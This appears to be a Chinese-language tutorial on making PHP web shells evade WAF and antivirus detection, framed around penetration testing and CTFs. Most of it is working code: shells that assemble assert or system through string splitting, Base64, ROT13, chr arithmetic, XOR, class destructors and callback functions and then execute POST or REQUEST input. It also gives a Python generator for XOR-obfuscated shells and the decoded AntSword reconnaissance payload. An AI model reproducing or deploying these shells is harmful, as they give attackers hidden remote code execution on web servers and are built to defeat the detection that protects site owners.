php木马的混淆免杀探究
字数 939 2025-08-22 12:23:19
PHP木马混淆免杀技术详解
前言
在渗透测试或CTF竞赛中,面对Web应用防火墙(WAF)的防护,普通的一句话木马(Web Shell)通常会被检测出来。WAF的作用是监测并阻止恶意的HTTP请求和输入,因此要成功渗透并避免被检测,PHP木马免杀技术是非常重要的一项技能。
静态免杀技术
静态免杀主要通过修改代码,使得其中的关键字或可疑函数变得不可识别。以下是一些常见的静态免杀方法:
1. 关键字隐藏技术
拆解合并法
<?php
$ch = explode(".", "hello.ass.world.er.t");
$c = $ch[1] . $ch[3] . $ch[4]; //assert
$c($_POST['x']);
?>
二维数组隐藏
<?php
$f = substr_replace("systxx", "em", 4);
$z = array($arrayName = ($arrayName = ($arrayName = array('a' => $f('whoami')))));
var_dump($z);
2. 编码技术
ROT13编码
<?php
$c = str_rot13('n!ff!re!nffreg');
echo $c . "\n"; //a!ss!er!assert
$str = explode('!', $c)[3];
echo $str; //asert
Base64编码
<?php
$f = base64_decode("YX____Nz__ZX__J0"); //解密后为assert高危函数
$f($_POST[aabyss]); //assert($_POST[aabyss]);
?>
ASCII编码
<?php
//ASCII编码解密后为assert高危函数
$f = chr(98-1).chr(116-1).chr(116-1).chr(103-2).chr(112+2).chr(110+6);
$f($_POST['aabyss']); //assert($_POST['aabyss']);
?>
3. 函数拼接技术
array_map实例
<?php
$letters = array('a','s','s','e','r','t');
$c = implode(array_map('strtolower', $letters)); // 使用array_map拼接assert
$c($_POST['x']);
?>
str_replace实例
<?php
$str = 'a';
$str = str_replace('a', 'a', $str);
$str .= 's';
$str .= 's';
$str .= 'e';
$str .= 'r';
$str .= 't';
$str($_POST['x']);
4. 异或绕过技术
<?php
$_StL = "Y" ^ "\x38";
$_ENr = "T" ^ "\x27";
$_ohw = "^" ^ "\x2d";
$_gpN = "~" ^ "\x1b";
$_fyR = "g" ^ "\x15";
$_pAs = "H" ^ "\x3c";
$c = $_StL.$_ENr.$_ohw.$_gpN.$_fyR.$_pAs;
Python生成异或绕过免杀马脚本:
import random
def random_keys(len):
str = '`abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str, len))
def random_var(len):
str = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str, len))
def xor(c1, c2):
return hex(ord(c1) ^ ord(c2)).replace('0x', r"\x")
def generate(target):
key = random_keys(len(target))
func_line = ''
call = '$target='
for i in range(0, len(target)):
enc = xor(target[i], key[i])
var = random_var(3)
func_line += f'$_{var}="{key[i]}"^"{enc}";'
func_line += '\n'
call += '$_%s.' % var
call = call.rstrip('.') + ';'
print(func_line)
print(call)
if __name__ == '__main__':
target = input('input target to generate: \r\n')
generate(target)
5. 类与函数分散技术
多函数分散
<?php
function getPart($str, $i) { return substr($str, $i, 1); }
function combineParts() {
return getPart('a',0).getPart('s',0).getPart('s',0).getPart('e',0).getPart('r',0).getPart('t',0);
}
$c = combineParts();
@$c($_POST['x']);
?>
类方法隐藏
<?php
class Test {
public $config = '';
function __destruct() {
$ch = explode(".", "hello.ass.world.er.rt.e.saucerman");
$c = $ch[1].$ch[5].$ch[4];
@$c($this->config);
}
}
$test = new Test();
@$test->config = $_POST['x'];
6. 冷门回调函数技术
array_uintersect_uassoc示例
<?php
function myfunction_key($a, $b){
if($a===$b){ return 0; }
return ($a>$b)?1:-1;
}
class rtHjmCdS {
public $fHfoj;
public $fDaGv;
public $HgAjSd;
function __construct(){
$_xlr = "J" ^ "\x2b";
$_Nbv = "V" ^ "\x25";
$_cfh = "T" ^ "\x27";
$_PdK = "I" ^ "\x2c";
$_zJQ = "+" ^ "\x59";
$_RgD = "=" ^ "\x49";
$this->fDaGv = $_xlr.$_Nbv.$_cfh.$_PdK.$_zJQ.$_RgD;
$_fLd = "a" ^ "\x0";
$_wOK = "j" ^ "\x18";
$_tAH = "U" ^ "\x27";
$_HeV = "J" ^ "\x2b";
$_cyo = "-" ^ "\x54";
$_iSW = "F" ^ "\x19";
$_jYS = "/" ^ "\x5a";
$_BFt = "h" ^ "\x1";
$_TRn = "p" ^ "\x1e";
$_izx = "k" ^ "\x1f";
$_gMz = "X" ^ "\x3d";
$_TNu = "<" ^ "\x4e";
$_UiE = "v" ^ "\x5";
$_iHI = "q" ^ "\x14";
$_LIK = "m" ^ "\xe";
$_Yey = "Z" ^ "\x2e";
$_lMr = "=" ^ "\x62";
$_WOI = "+" ^ "\x5e";
$_FQy = "u" ^ "\x14";
$_sjC = "d" ^ "\x17";
$_mOr = ">" ^ "\x4d";
$_Txf = "*" ^ "\x45";
$_PmW = "O" ^ "\x2c";
$this->HgAjSd = $_fLd.$_wOK.$_tAH.$_HeV.$_cyo.$_iSW.$_jYS.$_BFt.$_TRn.$_izx.$_gMz.$_TNu.$_UiE.$_iHI.$_LIK.$_Yey.$_lMr.$_WOI.$_FQy.$_sjC.$_mOr.$_Txf.$_PmW;
}
function __destruct(){
$Hfdag = $this->HgAjSd; //'array_uintersect_uassoc'
$fdJfd = $this->fDaGv; // 'assert'
@$Hfdag(array($this->fHfoj),array(''),$fdJfd,'myfunction_key');
}
}
$jfnp = new rtHjmCdS();
@$jfnp->fHfoj = $_REQUEST['css'];
?>
其他常见回调函数:
- call_user_func_array()
- call_user_func()
- array_filter()
- array_walk()
- array_map()
- register_shutdown_function()
- register_tick_function()
- filter_var()
- filter_var_array()
- uasort()
- uksort()
- array_reduce()
- array_walk()
- array_walk_recursive()
7. 字符串读取技术
读取注释
<?php
/**
* system('whoami');
* */
class User {}
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
echo $comment;
echo "\n";
$f = substr($comment, 8, 17);
echo $f;
eval($f);
读取数据库
<?php
// 写入数据库文件
$datatest = "[文件的base64编码]";
file_put_contents('./要写入的文件名', base64_decode($datatest));
// 读取数据库内容
$path = "数据库文件名";
$db = new PDO("sqlite:" . $path);
$sql_stmt = $db->prepare('select * from test where name="system"');
$sql_stmt->execute();
$f = substr($sql_stmt->queryString, -7, 6);
$f($_GET['b']);
动态免杀技术
要绕过流量监测,尤其是WAF的检测,我们可以通过对木马的动态行为、函数和关键字进行混淆和编码。
蚁剑连接示例
原始木马:
<?php
class Test {
public $name = '';
function __destruct(){
@eval("$this->name");
}
}
$test = new Test();
$c = @$_POST['css'];
$test->name = $c;
蚁剑连接时的POST数据(解码后):
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out) { return $out; }
function asoutput() {
$output = ob_get_contents();
ob_end_clean();
echo "ae2ea";
echo @asenc($output);
echo "348cb";
}
ob_start();
try {
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
if($D == "") {
$D = dirname($_SERVER["PATH_TRANSLATED"]);
}
$R = "{$D}\t";
if(substr($D,0,1) != "/") {
foreach(range("C","Z") as $L) {
if(is_dir("{$L}:")) {
$R .= "{$L}:";
}
}
} else {
$R .= "/";
}
$R .= "\t";
$u = function_exists("posix_getegid") ? @posix_getpwuid(@posix_geteuid()) : "";
$s = $u ? $u["name"] : @get_current_user();
$R .= php_uname();
$R .= "\t{$s}";
echo $R;
} catch(Exception $e) {
echo "ERROR://".$e->getMessage();
}
asoutput();
die();
总结
PHP木马免杀技术主要包括:
-
静态免杀:
- 关键字拆分与拼接
- 各种编码技术(Base64、ROT13、ASCII等)
- 异或运算绕过
- 使用冷门回调函数
- 类与函数分散技术
- 字符串读取技术
-
动态免杀:
- 流量混淆
- 动态行为伪装
- 蚁剑等工具的特殊编码方式
这些技术可以单独使用,也可以组合使用以达到更好的免杀效果。在实际应用中,需要根据目标环境的特点选择合适的免杀方法。